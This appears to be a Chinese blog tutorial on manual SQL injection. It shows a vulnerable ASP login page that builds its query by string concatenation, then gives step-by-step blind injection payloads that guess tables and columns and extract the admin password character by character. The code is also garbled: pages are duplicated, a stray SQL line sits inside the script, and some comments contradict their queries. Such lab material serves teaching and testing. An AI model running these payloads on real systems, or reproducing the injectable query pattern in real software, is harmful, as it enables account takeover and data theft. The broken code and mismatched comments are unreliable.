SQL手工注入测试

<html>  
<head><title>请登录</title></head>  
<body>  
 <div align="center">  
   <form action="login.asp" method="post">  
          请输入密码：  
          <br><br>  
          用 户：<input name="name" type="textbox">  
          <br>  
          密 码：<input name="pass" type="password">  
          <br>  
          <input value="登录" type="submit">  
  </form>  
 </div>  
</body>  
</html>

<html>

<body>

请输入密码：

用户：<input name="name" type="textbox">

<br>

密码：<input name="pass" type="password">

<br>

</form>

</div>

</body>

</html>

<html>  
<head>  
<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  
<title>登录</title>  
</head>  
<body>  
<%  
inname=Request("name")  
inpass=Request("pass")  
  
set conn=server.createobject("ADODB.CONNECTION")  
conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")  
sqlstr="SELECT * FROM data Where uname='" & inname & "'"  
  
select * from data where name = 'admin' and 1=1 and 'a'='a'  
Set rs=conn.Execute(sqlstr)  
  
if inpass=rs("pass") then     
  response.write("<h3>登录成功！</h3>")  
  response.write("用户编号：" & rs("uid") & "<br>")  
else  
  response.write("登录失败！")  
end if  
  
Set rs=Nothing  
conn.close  
%>  
</body>  
</html>

<html>

<head>

</head>

<body>

inname=Request("name")

inpass=Request("pass")

set conn=server.createobject("ADODB.CONNECTION")

conn.open "Provider=microsoft.jet.oledb.4.0; Data Source="+server.mappath("/data.db")

sqlstr="SELECT * FROM data Where uname='" & inname & "'"

select * from data where name = 'admin' and 1=1 and 'a'='a'

Set rs=conn.Execute(sqlstr)

if inpass=rs("pass") then

response.write("<h3>登录成功！</h3>")

response.write("用户编号：" & rs("uid") & "<br>")

else

response.write("登录失败！")

end if

Set rs=Nothing

conn.close

</body>

</html>

参数： http://192.168.10.1/login.asp?pass=test&name=test

原SQL语句：SELECT * FROM data Where uname='test'

1.构造能执行的SQL语句
http://192.168.10.1/login.asp?pass=test&name=test' and 1=1 and 'a'='a
相当于执行SQL语句为SELECT * FROM data Where uname='test' and 1=1 and 'a'='a'
如果执行成功，1=1就是我们可能执行的SQL语句

2.猜表名

将1=1替换 (select count(*) from data)>0
http://192.168.10.1/login.asp?pass=test&name=test' and (select count(*) from data)>0 and 'a'='a
相当于执行SQL语句
SELECT * FROM data Where uname='test' and (select count(*) from data)>0'

3.猜用户名字段
(select count(name) from data)>0

4.猜密码字段
(select count(pass) from data)>0

5.猜密码长度
//判断密码长度大于1
(Select count(*) from data where name='admin' and len(pass)>1)>0
//判断密码长度大于10
(Select count(*) from data where name='admin' and len(pass)<10)>0

6.逐位猜密码
//猜测第1位密码是否为数字
(Select count(*) from data where uname='admin' and mid(pass,1,1)<'9')>0
//猜测第1位密码是否为字母
(Select count(*) from data where uname='admin' and mid(pass,1,1)>'a')>0
//猜测第1位密码是否等于c
(Select count(*) from data where uname='admin' and mid(pass,2,1)='c')>0

转载请注明：exchen's blog » SQL手工注入测试

与本文相关的文章

Hi，您需要填写昵称和邮箱！